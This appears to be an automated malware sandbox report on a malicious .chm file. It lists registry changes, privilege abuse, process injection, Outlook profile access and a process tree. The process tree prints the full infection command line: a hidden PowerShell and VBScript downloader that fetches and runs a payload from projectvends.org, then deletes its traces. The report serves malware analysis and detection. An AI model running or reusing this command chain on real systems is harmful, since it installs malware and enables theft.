\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 SensorDataService.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A spectrum.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 spectrum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 SensorDataService.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName SensorDataService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A SensorDataService.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TieringEngineService.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz TieringEngineService.exe -
Kills process with taskkill 1 IoCs
pid Process 1016 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1130 = "Microsoft Modem Device Provider" fxssvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000ae19f9c5b56bdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1134 = "Microsoft Routing Extension" fxssvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-116 = "Microsoft Excel Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-914 = "SVG Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-103 = "Windows PowerShell Script" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a19292c5b56bdb01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9923 = "Windows Media playlist" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9925 = "MP3 Format Sound" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-180 = "Microsoft PowerPoint 97-2003 Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e31e7dc5b56bdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-184 = "Microsoft PowerPoint Macro-Enabled Design Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9910 = "Windows Media Audio/Video playlist" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie SearchFilterHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000df6b8bc5b56bdb01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-182 = "Microsoft PowerPoint Template" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\windows.storage.dll,-10152 = "File folder" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1133 = "Print" fxssvc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000041d34fc5b56bdb01 SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000df6b8bc5b56bdb01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-125 = "Microsoft Word Template" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wvx\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-34583 = "Saved Pictures" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000355a78c5b56bdb01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9914 = "Windows Media Audio/Video file" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-113 = "Microsoft Excel Binary Worksheet" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000097878ac6b56bdb01 SearchProtocolHost.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 112 powershell.exe 112 powershell.exe 1844 powershell.exe 1844 powershell.exe 2248 aken.pif 2248 aken.pif 2248 aken.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 2548 xbnitqnH.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif 1928 svchost.pif -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 47 IoCs
description pid Process Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeDebugPrivilege 1016 taskkill.exe Token: SeDebugPrivilege 2248 aken.pif Token: SeTakeOwnershipPrivilege 2548 xbnitqnH.pif Token: SeDebugPrivilege 2548 xbnitqnH.pif Token: SeAuditPrivilege 5704 fxssvc.exe Token: SeRestorePrivilege 5500 TieringEngineService.exe Token: SeManageVolumePrivilege 5500 TieringEngineService.exe Token: SeAssignPrimaryTokenPrivilege 4796 AgentService.exe Token: SeBackupPrivilege 4372 vssvc.exe Token: SeRestorePrivilege 4372 vssvc.exe Token: SeAuditPrivilege 4372 vssvc.exe Token: SeBackupPrivilege 5144 wbengine.exe Token: SeRestorePrivilege 5144 wbengine.exe Token: SeSecurityPrivilege 5144 wbengine.exe Token: 33 5388 SearchIndexer.exe Token: SeIncBasePriorityPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeTakeOwnershipPrivilege 5388 SearchIndexer.exe Token: SeDebugPrivilege 2548 xbnitqnH.pif Token: SeDebugPrivilege 2548 xbnitqnH.pif Token: SeDebugPrivilege 2548 xbnitqnH.pif Token: SeDebugPrivilege 2548 xbnitqnH.pif Token: SeDebugPrivilege 2548 xbnitqnH.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3748 hh.exe 3748 hh.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 3748 wrote to memory of 1260 3748 hh.exe 82 PID 3748 wrote to memory of 1260 3748 hh.exe 82 PID 1260 wrote to memory of 3640 1260 cmd.exe 84 PID 1260 wrote to memory of 3640 1260 cmd.exe 84 PID 1260 wrote to memory of 112 1260 cmd.exe 85 PID 1260 wrote to memory of 112 1260 cmd.exe 85 PID 112 wrote to memory of 4400 112 powershell.exe 86 PID 112 wrote to memory of 4400 112 powershell.exe 86 PID 1260 wrote to memory of 1844 1260 cmd.exe 87 PID 1260 wrote to memory of 1844 1260 cmd.exe 87 PID 1844 wrote to memory of 4672 1844 powershell.exe 88 PID 1844 wrote to memory of 4672 1844 powershell.exe 88 PID 1260 wrote to memory of 1016 1260 cmd.exe 90 PID 1260 wrote to memory of 1016 1260 cmd.exe 90 PID 4672 wrote to memory of 1980 4672 cmd.exe 92 PID 4672 wrote to memory of 1980 4672 cmd.exe 92 PID 4672 wrote to memory of 2344 4672 cmd.exe 93 PID 4672 wrote to memory of 2344 4672 cmd.exe 93 PID 4672 wrote to memory of 2344 4672 cmd.exe 93 PID 2344 wrote to memory of 3452 2344 x.exe 100 PID 2344 wrote to memory of 3452 2344 x.exe 100 PID 2344 wrote to memory of 3452 2344 x.exe 100 PID 2344 wrote to memory of 3600 2344 x.exe 102 PID 2344 wrote to memory of 3600 2344 x.exe 102 PID 2344 wrote to memory of 3600 2344 x.exe 102 PID 3600 wrote to memory of 1928 3600 cmd.exe 104 PID 3600 wrote to memory of 1928 3600 cmd.exe 104 PID 1928 wrote to memory of 1804 1928 svchost.pif 105 PID 1928 wrote to memory of 1804 1928 svchost.pif 105 PID 1804 wrote to memory of 4680 1804 cmd.exe 107 PID 1804 wrote to memory of 4680 1804 cmd.exe 107 PID 1804 wrote to memory of 4944 1804 cmd.exe 108 PID 1804 wrote to memory of 4944 1804 cmd.exe 108 PID 1804 wrote to memory of 1588 1804 cmd.exe 109 PID 1804 wrote to memory of 1588 1804 cmd.exe 109 PID 1804 wrote to memory of 3304 1804 cmd.exe 110 PID 1804 wrote to memory of 3304 1804 cmd.exe 110 PID 3304 wrote to memory of 2228 3304 alpha.pif 117 PID 3304 wrote to memory of 2228 3304 alpha.pif 117 PID 1804 wrote to memory of 1980 1804 cmd.exe 112 PID 1804 wrote to memory of 1980 1804 cmd.exe 112 PID 1980 wrote to memory of 1608 1980 alpha.pif 113 PID 1980 wrote to memory of 1608 1980 alpha.pif 113 PID 1804 wrote to memory of 4312 1804 cmd.exe 114 PID 1804 wrote to memory of 4312 1804 cmd.exe 114 PID 4312 wrote to memory of 2248 4312 alpha.pif 139 PID 4312 wrote to memory of 2248 4312 alpha.pif 139 PID 2344 wrote to memory of 2548 2344 x.exe 116 PID 2344 wrote to memory of 2548 2344 x.exe 116 PID 2344 wrote to memory of 2548 2344 x.exe 116 PID 2344 wrote to memory of 2548 2344 x.exe 116 PID 2344 wrote to memory of 2548 2344 x.exe 116 PID 5388 wrote to memory of 3464 5388 SearchIndexer.exe 145 PID 5388 wrote to memory of 3464 5388 SearchIndexer.exe 145 PID 5388 wrote to memory of 6040 5388 SearchIndexer.exe 146 PID 5388 wrote to memory of 6040 5388 SearchIndexer.exe 146 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 xbnitqnH.pif
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\system32\extrac32.exeextrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe3⤵PID:3640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Public\ript.exe"C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/PT.cmd C:\\Users\\Public\\df.cmd4⤵
- Executes dropped EXE
PID:4400
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\df.cmd" "4⤵
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\system32\extrac32.exeextrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\x.exe"C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\HnqtinbxF.cmd" "6⤵
- System Location Discovery: System Language Discovery
